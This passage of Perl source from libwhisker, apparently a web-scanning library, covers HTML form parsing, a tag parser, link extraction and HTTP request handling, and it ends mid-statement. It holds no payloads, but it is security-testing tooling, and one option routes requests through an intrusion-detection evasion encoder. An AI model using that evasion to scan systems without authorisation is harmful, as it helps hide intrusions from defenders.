'input'    => 1,\n    'textarea' => 1,\n    'button'   => 1,\n    'select'   => 1,\n    'option'   => 1,\n    '/select'  => 1\n);\n\n################################################################\n\n=item B<forms_read>\n\nParams: \\$html_data\n\nReturn: \\@found_forms\n\nThis function parses the given $html_data into libwhisker form hashes.\nIt returns a reference to an array of hash references to the found\nforms.\n\n=cut\n\nsub forms_read {\n    my $dr = shift;\n    return undef if ( !ref($dr) || length($$dr) == 0 );\n\n    my $A = [ {}, [] ];\n\n    html_find_tags( $dr, \\&_forms_parse_callback, 0, $A, \\%_forms_ELEMENTS );\n\n    if ( scalar %{ $A->[0] } ) {\n        push( @{ $A->[1] }, $A->[0] );\n    }\n\n    return $A->[1];\n}\n\n################################################################\n\n=item B<forms_write>\n\nParams: \\%form_hash\n\nReturn: $html_of_form [undef on error]\n\nThis function will take the given %form hash and compose a generic HTML\nrepresentation of it, formatted with tabs and newlines in order to make it\nneat and tidy for printing.\n\nNote: this function does *not* escape any special characters that were\nembedded in the element values.\n\n=cut\n\nsub forms_write {\n    my $hr = shift;\n    return undef if ( !ref($hr) || !( scalar %$hr ) );\n    return undef if ( !defined $$hr{\"\\0\"} );\n\n    my $t = '<form name=\"' . $$hr{\"\\0\"}->[0] . '\" method=\"';\n    $t .= $$hr{\"\\0\"}->[1] . '\" action=\"' . $$hr{\"\\0\"}->[2] . '\"';\n    if ( defined $$hr{\"\\0\"}->[3] ) {\n        $t .= ' ' . join( ' ', @{ $$hr{\"\\0\"}->[3] } );\n    }\n    $t .= \">\\n\";\n\n    my ( $name, $ar );\n    while ( ( $name, $ar ) = each(%$hr) ) {\n        next if ( $name eq \"\\0\" );\n        next if ( $name eq '' && $ar->[0]->[0] eq '' );\n        foreach $a (@$ar) {\n            my $P = '';\n            $P = ' ' . join( ' ', @{ $$a[2] } ) if ( defined $$a[2] );\n            $t .= \"\\t\";\n\n            if ( $$a[0] eq 'textarea' ) {\n                $t .= \"<textarea name=\\\"$name\\\"$P>$$a[1]\";\n                $t .= \"</textarea>\\n\";\n\n            }\n            elsif ( $$a[0] =~ m/^input-(.+)$/ ) {\n                $t .= \"<input type=\\\"$1\\\" name=\\\"$name\\\" \";\n                $t .= \"value=\\\"$$a[1]\\\"$P>\\n\";\n\n            }\n            elsif ( $$a[0] eq 'option' ) {\n                $t .= \"\\t<option value=\\\"$$a[1]\\\"$P>$$a[1]\\n\";\n\n            }\n            elsif ( $$a[0] eq 'select' ) {\n                $t .= \"<select name=\\\"$name\\\"$P>\\n\";\n\n            }\n            elsif ( $$a[0] eq '/select' ) {\n                $t .= \"</select$P>\\n\";\n\n            }\n            else {    # button\n                $t .= \"<button name=\\\"$name\\\" value=\\\"$$a[1]\\\">\\n\";\n            }\n        }\n    }\n\n    $t .= \"</form>\\n\";\n    return $t;\n}\n\n################################################################\n\n{    # these are 'private' static variables for &_forms_parse_html\n    my $CURRENT_SELECT = undef;\n    my $UNKNOWNS       = 0;\n\n    sub _forms_parse_callback {\n        my ( $TAG, $hr, $dr, $start, $len, $ar ) = ( lc(shift), @_ );\n        my ( $saveparam, $parr, $key ) = ( 0, undef, '' );\n\n        my $_forms_CURRENT = $ar->[0];\n        my $_forms_FOUND   = $ar->[1];\n\n        if ( scalar %$hr ) {\n            while ( my ( $key, $val ) = each %$hr ) {\n                if ( $key =~ tr/A-Z// ) {\n                    delete $$hr{$key};\n                    if ( defined $val ) { $$hr{ lc($key) } = $val; }\n                    else { $$hr{ lc($key) } = undef; }\n                }\n            }\n        }\n\n        if ( $TAG eq 'form' ) {\n            if ( scalar %$_forms_CURRENT ) {    # save last form\n                push( @$_forms_FOUND, $_forms_CURRENT );\n                $ar->[0] = {};\n                $_forms_CURRENT = $ar->[0];\n            }\n\n            $_forms_CURRENT->{\"\\0\"} =\n              [ $$hr{name}, $$hr{method}, $$hr{action}, [] ];\n            delete $$hr{'name'};\n            delete $$hr{'method'};\n            delete $$hr{'action'};\n            $key      = \"\\0\";\n            $UNKNOWNS = 0;\n\n        }\n        elsif ( $TAG eq 'input' ) {\n            $$hr{type}  = 'text'                  if ( !defined $$hr{type} );\n            $$hr{name}  = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n            $$hr{value} = undef                   if ( !defined $$hr{value} );\n            $key        = $$hr{name};\n\n            push @{ $_forms_CURRENT->{$key} },\n              [ 'input-' . $$hr{type}, $$hr{value}, [] ];\n            delete $$hr{'name'};\n            delete $$hr{'type'};\n            delete $$hr{'value'};\n\n        }\n        elsif ( $TAG eq 'select' ) {\n            $$hr{name} = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n            $key = $$hr{name};\n            push @{ $_forms_CURRENT->{$key} }, [ 'select', undef, [] ];\n            $CURRENT_SELECT = $key;\n            delete $$hr{name};\n\n        }\n        elsif ( $TAG eq '/select' ) {\n            push @{ $_forms_CURRENT->{$CURRENT_SELECT} },\n              [ '/select', undef, [] ];\n            $CURRENT_SELECT = undef;\n            return undef;\n\n        }\n        elsif ( $TAG eq 'option' ) {\n            return undef if ( !defined $CURRENT_SELECT );\n            if ( !defined $$hr{value} ) {\n                my $stop = index( $$dr, '<', $start + $len );\n                return undef if ( $stop == -1 );    # MAJOR PUKE\n                $$hr{value} =\n                  substr( $$dr, $start + $len, ( $stop - $start - $len ) );\n                $$hr{value} =~ tr/\\r\\n//d;\n            }\n            push @{ $_forms_CURRENT->{$CURRENT_SELECT} },\n              [ 'option', $$hr{value}, [] ];\n            delete $$hr{value};\n\n        }\n        elsif ( $TAG eq 'textarea' ) {\n            my $stop = $start + $len;\n            $$hr{value} = $$hr{'='};\n            delete $$hr{'='};\n            $$hr{name} = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n            $key = $$hr{name};\n            push @{ $_forms_CURRENT->{$key} }, [ 'textarea', $$hr{value}, [] ];\n            delete $$hr{'name'};\n            delete $$hr{'value'};\n\n        }\n        else {    # button\n            $$hr{name}  = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n            $$hr{value} = undef                   if ( !defined $$hr{value} );\n            $key        = $$hr{name};\n            push @{ $_forms_CURRENT->{$key} }, [ 'button', $$hr{value}, [] ];\n            delete $$hr{'name'};\n            delete $$hr{'value'};\n        }\n\n        if ( scalar %$hr ) {\n            if ( $TAG eq 'form' ) { $parr = $_forms_CURRENT->{$key}->[3]; }\n            else {\n                $parr = $_forms_CURRENT->{$key}->[-1];\n                $parr = $parr->[2];\n            }\n\n            my ( $k, $v );\n            while ( ( $k, $v ) = each(%$hr) ) {\n                if ( defined $v ) { push @$parr, \"$k=\\\"$v\\\"\"; }\n                else { push @$parr, $k; }\n            }\n        }\n\n        return undef;\n    }\n}\n\n\n################################################################\n\n=item B<html_find_tags>\n\nParams: \\$data, \\&callback_function [, $xml_flag, $funcref, \\%tag_map]\n\nReturn: nothing\n\nhtml_find_tags parses a piece of HTML and 'extracts' all found tags,\npassing the info to the given callback function.  The callback function\nmust accept two parameters: the current tag (as a scalar), and a hash ref\nof all the tag's elements. For example, the tag <a href=\"/file\"> will\npass 'a' as the current tag, and a hash reference which contains\n{'href'=>\"/file\"}.\n\nThe xml_flag, when set, causes the parser to do some extra processing\nand checks to accommodate XML style tags such as <tag foo=\"bar\"/>.\n\nThe optional %tagmap is a hash of lowercase tag names.  If a tagmap is\nsupplied, then the parser will only call the callback function if the\ntag name exists in the tagmap.\n\nThe optional $funcref variable is passed straight to the callback\nfunction, allowing you to pass flags or references to more complex\nstructures to your callback function.\n\n=cut\n\n{    # contained variables\n    $DR  = undef;    # data reference\n    $c   = 0;        # parser pointer\n    $LEN = 0;\n\n    sub html_find_tags {\n        my ( $dataref, $callbackfunc, $xml, $fref, $tagmap ) = @_;\n\n        return if ( !( defined $dataref      && ref($dataref) ) );\n        return if ( !( defined $callbackfunc && ref($callbackfunc) ) );\n        $xml ||= 0;\n\n        my ( $INTAG, $CURTAG, $LCCURTAG, $ELEMENT, $VALUE, $cc ) = (0);\n        my ( %TAG, $ret, $start, $tagstart, $tempstart, $x, $found );\n        my $usetagmap = ( ( defined $tagmap && ref($tagmap) ) ? 1 : 0 );\n        $CURTAG = $LCCURTAG = $ELEMENT = $VALUE = $cc = '';\n        $DR     = $dataref;\n\n        $LEN = length($$dataref);\n        for ( $c = 0 ; $c < $LEN ; $c++ ) {\n\n            $cc = substr( $$dataref, $c, 1 );\n            next if ( !$INTAG && $cc ne '>' && $cc ne '<' );\n\n            if ( $cc eq '<' ) {\n                if ($INTAG) {\n\n                    # we're already in a tag...\n                    # we trick the parser into thinking we end cur tag\n                    $cc = '>';\n                    $c--;\n\n                }\n                elsif ($xml\n                    && $LEN > ( $c + 9 )\n                    && substr( $$dataref, $c + 1, 8 ) eq '![CDATA[' )\n                {\n                    $c += 9;\n                    $tempstart = $c;\n                    $found     = index( $$dataref, ']]>', $c );\n                    $c         = $found + 2;\n                    $c         = $LEN if ( $found < 0 );         # malformed XML\n                         # what to do with CDATA?\n                    next;\n\n                }\n                elsif ( $LEN > ( $c + 3 )\n                    && substr( $$dataref, $c + 1, 3 ) eq '!--' )\n                {\n                    $tempstart = $c;\n                    $c += 4;\n                    $found = index( $$dataref, '-->', $c );\n                    if ( $found < 0 ) {\n                        $found = index( $$dataref, '>', $c );\n                        $found = $LEN if ( $found < 0 );\n                        $c = $found;\n                    }\n                    else {\n                        $c = $found + 2;\n                    }\n                    if ( $usetagmap == 0 || defined $tagmap->{'!--'} ) {\n                        my $dat = substr(\n                            $$dataref,\n                            $tempstart + 4,\n                            $found - $tempstart - 4\n                        );\n                        &$callbackfunc( '!--', { '=' => $dat },\n                            $dataref, $tempstart, $c - $tempstart + 1, $fref );\n                    }\n                    next;\n\n                }\n                elsif ( !$INTAG ) {\n                    next if ( substr( $$dataref, $c + 1, 1 ) =~ tr/ \\t\\r\\n// );\n                    $c++;\n                    $INTAG    = 1;\n                    $tagstart = $c - 1;\n\n                    $CURTAG = '';\n                    while ( $c < $LEN\n                        && ( $x = substr( $$dataref, $c, 1 ) ) !~\n                        tr/ \\t\\r\\n>=// )\n                    {\n                        $CURTAG .= $x;\n                        $c++;\n                    }\n\n                    chop $CURTAG if ( $xml && substr( $CURTAG, -1, 1 ) eq '/' );\n                    $c++ if ( defined $x && $x ne '>' );\n\n                    $LCCURTAG = lc($CURTAG);\n                    $INTAG = 0 if ( $LCCURTAG !~ tr/a-z0-9// );\n                    next if ( $c >= $LEN );\n                    $cc = substr( $$dataref, $c, 1 );\n                }\n            }\n\n            if ( $cc eq '>' ) {\n                next if ( !$INTAG );\n                if ( $LCCURTAG eq 'script' && !$xml ) {\n                    $tempstart = $c + 1;\n                    pos($$dataref) = $c;\n                    if ( $$dataref !~ m#(</script.*?>)#ig ) {\n\n                        # what to do if closing script not found?\n                        # right now, we'll just leave the tag alone;\n                        # this won't affect the 'absorption' of the\n                        # javascript code (and thus, affect parsing)\n                    }\n                    else {\n                        $c = pos($$dataref) - 1;\n                        my $l = length($1);\n                        $TAG{'='} =\n                          substr( $$dataref, $tempstart,\n                            $c - $tempstart - $l + 1 );\n                    }\n\n                }\n                elsif ( $LCCURTAG eq 'textarea' && !$xml ) {\n                    $tempstart = $c + 1;\n                    pos($$dataref) = $c;\n                    if ( $$dataref !~ m#(</textarea.*?>)#ig ) {\n\n                        # no closing textarea...\n                    }\n                    else {\n                        $c = pos($$dataref) - 1;\n                        my $l = length($1);\n                        $TAG{'='} =\n                          substr( $$dataref, $tempstart,\n                            $c - $tempstart - $l + 1 );\n                    }\n                }\n\n                $INTAG = 0;\n                $TAG{'/'}++\n                  if ( $xml && substr( $$dataref, $c - 1, 1 ) eq '/' );\n                &$callbackfunc( $CURTAG, \\%TAG, $dataref, $tagstart,\n                    $c - $tagstart + 1, $fref )\n                  if ( $usetagmap == 0 || defined $tagmap->{$LCCURTAG} );\n                $CURTAG = $LCCURTAG = '';\n                %TAG = ();\n                next;\n            }\n\n            if ($INTAG) {\n                $ELEMENT = '';\n                $VALUE   = undef;\n\n                # eat whitespace\n                pos($$dataref) = $c;\n                if ( $$dataref !~ m/[^ \\t\\r\\n]/g ) {\n                    $c = $LEN;\n                    next;    # should we really abort?\n                }\n                $start = pos($$dataref) - 1;\n\n                if ( $$dataref !~ m/[ \\t\\r\\n<>=]/g ) {\n                    $c = $LEN;\n                    next;    # should we really abort?\n                }\n                $c = pos($$dataref) - 1;\n\n                if ( $c > $start ) {\n                    $ELEMENT = substr( $$dataref, $start, $c - $start );\n                    chop $ELEMENT\n                      if ( $xml && substr( $ELEMENT, -1, 1 ) eq '/' );\n                }\n\n                $cc = substr( $$dataref, $c, 1 );\n                if ( $cc ne '>' ) {\n\n                    # eat whitespace\n                    if ( $cc =~ tr/ \\t\\r\\n// ) {\n                        $c++\n                          while ( substr( $$dataref, $c, 1 ) =~ tr/ \\t\\r\\n// );\n                    }\n\n                    if ( substr( $$dataref, $c, 1 ) eq '=' ) {\n                        $c++;\n                        $start = $c;\n                        my $p = substr( $$dataref, $c, 1 );\n                        if ( $p eq '\"' || $p eq '\\'' ) {\n                            $c++;\n                            $start++;\n                            $c = index( $$dataref, $p, $c );\n                            if ( $c < 0 ) { $c = $LEN; next; }    # Bad HTML\n                            $VALUE = substr( $$dataref, $start, $c - $start );\n                            $c++;\n                            pos($$dataref) = $c;\n                        }\n                        else {\n                            pos($$dataref) = $c;\n                            if ( $$dataref !~ /[ \\t\\r\\n>]/g ) {\n                                $c = $LEN;\n                            }\n                            else {\n                                $c     = pos($$dataref) - 1;\n                                $VALUE =\n                                  substr( $$dataref, $start, $c - $start );\n                                chop $VALUE\n                                  if ( $xml\n                                    && substr( $$dataref, $c - 1, 2 ) eq '/>' );\n                            }\n                        }\n\n                        if ( substr( $$dataref, $c, 1 ) =~ tr/ \\t\\r\\n// ) {\n                            if ( $$dataref !~ /[^ \\t\\r\\n]/g ) {\n                                $c = $LEN;\n                                next;    # should we really abort?\n                            }\n                            $c = pos($$dataref) - 1;\n                        }\n                    }\n                }    # if $c ne '>'\n                $c--;\n                $TAG{$ELEMENT} = $VALUE\n                  if ( $ELEMENT ne '' || ( $xml && $ELEMENT ne '/' ) );\n            }\n        }\n\n        # finish off any tags we had going\n        if ($INTAG) {\n            &$callbackfunc( $CURTAG, \\%TAG, $dataref, $tagstart,\n                $c - $tagstart + 1, $fref )\n              if ( $usetagmap == 0 || defined $tagmap->{$LCCURTAG} );\n        }\n\n        $DR = undef;    # void dataref pointer\n    }\n\n################################################################\n\n=item B<html_find_tags_rewrite>\n\nParams: $position, $length, $replacement\n\nReturn: nothing\n\nhtml_find_tags_rewrite() is used to 'rewrite' an HTML stream from\nwithin an html_find_tags() callback function.  In general, you can\nthink of html_find_tags_rewrite working as:\n\nsubstr(DATA, $position, $length) = $replacement\n\nWhere DATA is the current HTML string the html parser is using.\nThe reason you need to use this function and not substr() is\nbecause a few internal parser pointers and counters need to be\nadjusted to accommodate the changes.\n\nIf you want to remove a piece of the string, just set the\nreplacement to an empty string ('').  If you wish to insert a\nstring instead of overwrite, just set $length to 0; your string\nwill be inserted at the indicated $position.\n\n=cut\n\n    sub html_find_tags_rewrite {\n        return if ( !defined $DR );\n        my ( $pos, $len, $replace_str ) = @_;\n\n        # replace the data\n        substr( $$DR, $pos, $len ) = $replace_str;\n\n        # adjust pointer and length\n        my $l = ( length($replace_str) - $len );\n        $c   += $l;\n        $LEN += $l;\n    }\n\n################################################################\n\n    sub _html_find_tags_adjust {\n        my ( $p, $l ) = @_;\n        $c   += $p;\n        $LEN += $l;\n    }\n}    # end container\n\n################################################################\n\n=item B<html_link_extractor>\n\nParams: \\$html_data\n\nReturn: @urls\n\nThe html_link_extractor() function uses the internal crawl tests to\nextract all the HTML links from the given HTML data stream.\n\nNote: html_link_extractor() does not unique the returned array of\ndiscovered links, nor does it attempt to remove javascript links\nor make the links absolute.  It just extracts every raw link from\nthe HTML stream and returns it.  You'll have to do your own\npost-processing.\n\n=cut\n\nsub html_link_extractor {\n    my $data = shift;\n    my $ptr;\n    if ( ref($data) ) {\n        $ptr = $data;\n    }\n    else {\n        $ptr = \\$data;\n    }\n\n    # emulate the crawl object parts we need\n    my %OBJ = ( urls => [], forms => {} );\n    $OBJ{response}                   = {};\n    $OBJ{response}->{whisker}        = {};\n    $OBJ{response}->{whisker}->{uri} = '';\n\n    html_find_tags(\n        $ptr,                           # data\n        \\&_crawl_extract_links_test,    # callback function\n        0,                              # xml mode\n        \\%OBJ,                          # data object\n        \\%_crawl_linktags\n    );                                  # tagmap\n\n    return @{ $OBJ{urls} };\n}\n\n################################################################\n\n\n##################################################################\n\n# cluster global variables\n%http_host_cache = ();\n\n##################################################################\n\n=item B<http_new_request>\n\nParams: %parameters\n\nReturn: \\%request_hash\n\nThis function basically 'objectifies' the creation of whisker\nrequest hash objects.  You would call it like:\n\n $req = http_new_request( host=>'www.example.com', uri=>'/' )\n\nwhere 'host' and 'uri' can be any number of {whisker} hash\ncontrol values (see http_init_request for default list).\n\n=cut\n\nsub http_new_request {\n    my %X = @_;\n    my ( $k, $v, %RET, %RES );\n\n    http_init_request( \\%RET );\n    while ( ( $k, $v ) = each(%X) ) {\n        $RET{whisker}->{$k} = $v;\n    }\n    $RES{whisker}          = {};\n    $RES{whisker}->{MAGIC} = 31340;\n    $RES{whisker}->{uri}   = '';\n    return ( \\%RET, \\%RES ) if wantarray();\n    return \\%RET;\n}\n\n##################################################################\n\n=item B<http_new_response>\n\nParams: [none]\n\nReturn: \\%response_hash\n\nThis function basically 'objectifies' the creation of whisker\nresponse hash objects.  You would call it like:\n\n\t$resp = http_new_response()\n\n=cut\n\nsub http_new_response {\n    my %RET;\n    $RET{whisker}          = {};\n    $RET{whisker}->{MAGIC} = 31340;\n    $RET{whisker}->{uri}   = '';\n    return \\%RET;\n}\n\n##################################################################\n\n=item B<http_init_request>\n\nParams: \\%request_hash_to_initialize\n\nReturn: Nothing (modifies input hash)\n\nSets default values to the input hash for use.  Sets the host to\n'localhost', port 80, request URI '/', using HTTP 1.1 with GET\nmethod.  The timeout is set to 10 seconds, no proxies are defined, and all\nURI formatting is set to standard HTTP syntax.  It also sets the\nConnection (Keep-Alive) and User-Agent headers.\n\nNOTICE!!  It's important to use http_init_request before calling\nhttp_do_request, or http_do_request might puke.  Thus, a special magic\nvalue is placed in the hash to let http_do_request know that the hash has\nbeen properly initialized.  If you really must 'roll your own' and not use\nhttp_init_request before you call http_do_request, you will at least need\nto set the MAGIC value (amongst other things).\n\n=cut\n\nsub http_init_request {    # doesn't return anything\n    my ($hin) = shift;\n\n    return if ( !( defined $hin && ref($hin) ) );\n    %$hin = ();            # clear control hash\n\n    # control values\n    $$hin{whisker} = {\n        http_space1                   => ' ',\n        http_space2                   => ' ',\n        version                       => '1.1',\n        method                        => 'GET',\n        protocol                      => 'HTTP',\n        port                          => 80,\n        uri                           => '/',\n        uri_prefix                    => '',\n        uri_postfix                   => '',\n        uri_param_sep                 => '?',\n        host                          => 'localhost',\n        timeout                       => 10,\n        include_host_in_uri           => 0,\n        ignore_duplicate_headers      => 1,\n        normalize_incoming_headers    => 1,\n        lowercase_incoming_headers    => 0,\n        require_newline_after_headers => 0,\n        invalid_protocol_return_value => 1,\n        ssl                           => 0,\n        ssl_save_info                 => 0,\n        http_eol                      => \"\\x0d\\x0a\",\n        force_close                   => 0,\n        force_open                    => 0,\n        retry                         => 1,\n        trailing_slurp                => 0,\n        force_bodysnatch              => 0,\n        max_size                      => 0,\n        MAGIC                         => 31339\n    };\n\n    # default header values\n    $$hin{'Connection'} = 'Keep-Alive';\n    $$hin{'User-Agent'} = \"Mozilla (libwhisker/$LW2::VERSION)\";\n}\n\n##################################################################\n\n=item B<http_do_request>\n\nParams: \\%request, \\%response [, \\%configs]\n\nReturn: >=1 if error; 0 if no error (also modifies response hash)\n\n*THE* core function of libwhisker.  http_do_request actually performs\nthe HTTP request, using the values submitted in %request, and placing result\nvalues in %response.  This allows you to resubmit %request in subsequent\nrequests (%response is automatically cleared upon execution).  You can\nsubmit 'runtime' config directives as %configs, which will be spliced into\n$hin{whisker}->{} before anything else.  That means you can do:\n\nLW2::http_do_request(\\%req,\\%resp,{'uri'=>'/cgi-bin/'});\n\nThis will set $req{whisker}->{'uri'}='/cgi-bin/' before execution, and\nprovides a simple shortcut (note: it does modify %req).\n\nThis function will also retry any requests that bomb out during the\ntransaction (but not during the connecting phase).  This is controlled\nby the {whisker}->{retry} value.  Also note that the returned error\nmessage in hout is the *last* error received.  All retry errors are\nput into {whisker}->{retry_errors}, which is an anonymous array.\n\nAlso note that all NTLM auth logic is implemented in http_do_request().\nNTLM requires multiple requests in order to work correctly, and so this\nfunction attempts to wrap that and make it all transparent, so that the\nfinal end result is what's passed to the application.\n\nThis function will return 0 on success, 1 on HTTP protocol error, and 2\non non-recoverable network connection error (you can retry error 1, but\nerror 2 means that the server is totally unreachable and there's no\npoint in retrying).\n\n=cut\n\nsub http_do_request {\n    my ( $hin, $hout ) = ( shift, shift );\n\n    return 2 if ( !( defined $hin  && ref($hin) ) );\n    return 2 if ( !( defined $hout && ref($hout) ) );\n\n    # setup hash\n    %$hout                     = ();\n    $$hout{whisker}            = {};\n    $$hout{whisker}->{'MAGIC'} = 31340;\n    $$hout{whisker}->{uri}     = $$hin{whisker}->{uri};\n\n    if (   !defined $$hin{whisker}\n        || !defined $$hin{whisker}->{'MAGIC'}\n        || $$hin{whisker}->{'MAGIC'} != 31339 )\n    {\n        $$hout{whisker}->{error} = 'Input hash not initialized';\n        return 2;\n    }\n\n    if ( defined $_[0] ) {    # handle extra params\n        my %hashref;\n        if ( ref( $_[0] ) eq 'HASH' ) { %hashref = %{ $_[0] }; }\n        else { %hashref = @_; }\n        $$hin{whisker}->{$_} = $hashref{$_} foreach ( keys %hashref );\n    }\n    if ( defined $$hin{whisker}->{'anti_ids'} ) {    # handle anti_ids\n        my %copy = %$hin;\n        $copy{whisker} = {};\n        %{ $copy{whisker} } = %{ $$hin{whisker} };\n        encode_anti_ids( \\%copy, $$hin{whisker}->{'anti_ids'} );\n        $hin = \\%copy;\n    }\n\n    # find/setup stream\n    my $cache_key = stream_key($hin);\n    my $stream;\n    if ( !defined $http_host_cache{$cache_key} ) {\n        $stream = stream_new($hin);\n        $http_host_cache{$cache_key} = $stream;\n    }\n    else {\n        $stream = $http_host_cache{$cache_key};\n    }\n    if ( !defined $stream ) {\n        $$hout{whisker}->{error} = 'unable to allocate stream';\n        return 2;\n    }\n\n    my $retry_count = $$hin{whisker}->{retry};\n    my $puke_flag   = 0;\n    my $ret         = 1;\n    do {    # retries wrapper\n        my ( $aret, $pass );\n\n        if ( !$stream->{valid}->() ) {\n            $stream->{clearall}->();\n            if ( !$stream->{open}->($hin) ) {\n                $$hout{whisker}->{error} =\n                  'opening stream: ' . $stream->{error};\n                $$hout{whisker}->{error} .=\n                  '(reconnect problem after prior request)'\n                  if ($puke_flag);\n                return 2;\n            }\n\n            # freshly open stream/connection, handle auth\n            if (   defined $$hin{whisker}->{proxy_host}\n                && defined $$hin{whisker}->{auth_proxy_callback} )\n            {\n                $aret =\n                  $$hin{whisker}->{auth_proxy_callback}\n                  ->( $stream, $hin, $hout );\n                return $aret if ( $aret != 0 );    # proxy auth error\n            }\n            if ( defined $$hin{whisker}->{auth_callback} ) {\n                $aret =\n                  $$hin{whisker}->{auth_callback}->( $stream, $hin, $hout );\n                return 0     if ( $aret == 200 );    # auth not needed?\n                return $aret if ( $aret != 0 );      # auth error\n            }\n        }\n\n        _ssl_save_info( $hout, $stream )\n          if ( $$hin{whisker}->{ssl} > 0\n            && $$hin{whisker}->{ssl_save_info} > 0 );\n\n        $ret = _http_do_request_ex( $stream, $hin, $hout );\n        $puke_flag++\n          if ( $ret == 1 && defined( $$hout{whisker}->{http_data_sent} ) );\n        return $ret\n          if ( $ret == 0 || $ret == 2 );    # success or fatal socket error\n        $retry_count--;\n    } while ( $retry_count >= 0 );\n\n    # if we get here, we still had errors, but no more retries\n    return $ret;\n\n}\n\n##################################################################\n\nsub _http_do_request_ex {\n    my ( $stream, $hin, $hout, $raw ) = @_;\n\n    return 2 if ( !defined $stream );\n    return 2 if ( !( defined $hin && ref($hin) ) );\n    return 2 if ( !( defined $hout && ref($hout) ) );\n    my $W = $hin->{whisker};\n\n    # setup hash, if needed\n    if ( !defined $$hout{whisker}->{MAGIC}\n        || $$hout{whisker}->{MAGIC} != 31340 )\n    {\n        %$hout                     = ();\n        $$hout{whisker}            = {};\n        $$hout{whisker}->{'MAGIC'} = 31340;\n        $$hout{whisker}->{uri}     = $$hin{whisker}->{uri};\n    }\n\n    ##### construct and send request\n    $stream->{clear}->();\n\n    if ( defined $raw && ref($raw) ) {\n        $stream->{queue}->($$raw);\n\n    }\n    else {\n        $stream->{queue}->( http_req2line($hin) );\n\n        if ( $$W{version} ne '0.9' ) {\n            $stream->{queue}->( http_construct_headers($hin) );\n            $stream->{queue}->( $$W{raw_header_data} )\n              if ( defined $$W{raw_header_data} );\n            $stream->{queue}->( $$W{http_eol} );\n            $stream->{queue}->( $$W{data} ) if ( defined $$W{data} );\n        }    # http 0.9 support\n    }\n\n    # good time to fingerprint, if requested\n    if ( defined $$W{request_fingerprint} ) {\n        $$hout{whisker}->{request_fingerprint} =\n          'md5:' . md5( $stream->{bufout} )\n          if ( $$W{request_fingerprint} eq 'md5' );\n        $$hout{whisker}->{request_fingerprint} =\n          'md4:' . md4( $stream->{bufout} )\n          if ( $$W{request_fingerprint} eq 'md4' );\n    }\n\n    # all data is wrangled...actually send it now\n    if ( !$stream->{'write'}->() ) {\n        $$hout{whisker}->{'error'} = 'sending request: ' . $stream->{error};\n        $stream->{'close'}->();\n        return 1;\n    }\n\n    # needed for SSL requests\n    # NOTE: this is disabled because it's just a noop anyways\n    # $stream->{writedone}->();\n\n    $$hout{whisker}->{http_data_sent} = 1;\n    $$hout{whisker}->{'lowercase_incoming_headers'} =\n      $$W{'lowercase_incoming_headers'};\n\n    ##### read and parse response\n    my @H;\n    if ( $$W{'version'} ne '0.9' ) {\n        do {    # catch '100 Continue' responses\n            my $resp = _http_getline($stream);\n\n            if ( !defined $resp ) {\n                $$hout{whisker}->{error} = 'error reading HTTP response';\n                $$hout{whisker}->{data}  = $stream->{bufin};\n                $stream->{'close'}->();\n                return 1;\n            }\n\n            $$hout{whisker}->{'raw_header_data'} .= $resp\n              if ( defined $$W{'save_raw_headers'} );\n\n            if ( $resp !~\n                /^([^\\/]+)\\/(\\d\\.?\\d?)([ \\t]+)(\\d+)([ \\t]*)(.*?)([\\r\\n]+)/ )\n            {\n                $$hout{whisker}->{'error'} = 'invalid HTTP response';\n                $$hout{whisker}->{'data'}  = $resp;\n                while ( defined( $_ = _http_getline($stream) ) ) {\n                    $$hout{whisker}->{'data'} .= $_;\n                }\n                $stream->{'close'}->();\n                return $$W{'invalid_protocol_return_value'} || 1;\n            }\n\n            $$hout{whisker}->{protocol}    = $1;\n            $$hout{whisker}->{version}     = $2;\n            $$hout{whisker}->{http_space1} = $3;\n            $$hout{whisker}->{code}        = $4;\n            $$hout{whisker}->{http_space2} = $5;\n            $$hout{whisker}->{message}     = $6;\n            $$hout{whisker}->{http_eol}    = $7;\n            $$hout{whisker}->{'100_continue'}++ if ( $4 == 100 );\n            $$hout{whisker}->{'uri_requested'} = $$W{'uri'};\n\n            @H = http_read_headers( $stream, $hin, $hout );\n            if ( !$H[0] ) {\n                $$hout{whisker}->{'error'} =\n                  'Error in reading headers: ' . $H[1];\n                $stream->{'close'}->();\n                return 1;\n            }\n\n            if ( !defined $H[3] ) {    # connection\n                my ($t) = utils_find_lowercase_key( $hin, 'connection' );\n                $H[3] = $t || 'close';\n            }\n\n        } while ( $$hout{whisker}->{'code'} == 100 );\n\n    }\n    else {    # http ver 0.9, we need to fake it since headers are not sent\n        $$hout{whisker}->{version}      = '0.9';\n        $$hout{whisker}->{code}         = 200;\n        $$hout{whisker}->{message} \t= '';\n        $H[3]                           = 'close';\n    }\n\n    if ( $$hout{whisker}->{code}==404 && defined $$W{'shortcut_on_404'} ) {\n        $stream->{'close'}->();\n    }\n    elsif ( defined $$W{data_sock} ) {\n        $$hout{whisker}->{data_sock}   = $stream->{sock};\n        $$hout{whisker}->{data_stream} = $stream;\n    }\n    else {\n        if (\n            $$W{'force_bodysnatch'}\n            || (   $$W{'method'} ne 'HEAD'\n                && $$hout{whisker}->{'code'} != 206\n                && $$hout{whisker}->{'code'} != 102 )\n          )\n        {\n            return 1\n              if ( !http_read_body( $stream, $hin, $hout, $H[1], $H[2] ) );\n\n            # {hide_chunked_responses} stuff follows\n            if (   lc( $H[1] ) eq 'chunked'\n                && defined $$hin{whisker}->{hide_chunked_responses}\n                && $$hin{whisker}->{hide_chunked_responses} == 1\n                && !defined $$hin{whisker}->{save_raw_chunks} )\n            {\n                $$hout{'Content-Length'} = length( $$hout{whisker}->{data} );\n                utils_delete_lowercase_key( $hout, 'transfer-encoding' );\n                my $new = [];\n                my $cl  = 0;\n                foreach ( @{ $$hout{whisker}->{header_order} } ) {\n                    my $l = lc($_);\n                    if ( $l eq 'content-length' ) {\n                        $cl++;\n                        next if ( $cl > 1 );\n                    }\n                    push @$new, $_ if ( $l ne 'transfer-encoding' );\n                }\n                push @$new, 'Content-Length' if ( $cl == 0 );\n                $$hout{whisker}->{header_order} = $new;\n            }\n        }\n\n        my ($ch) = LW2::utils_find_lowercase_key( $hin, 'connection' );\n        my $cl = 0;\n        $cl++\n          if (\n            (\n                lc( $H[3] ) ne 'keep-alive' || ( defined $ch\n                    && $ch =~ m/close/i )\n            )\n            && $$W{'force_open'} != 1\n          );\n        $cl++ if ( $$W{'force_close'} > 0 || $stream->{forceclose} > 0 );\n        $cl++ if ( 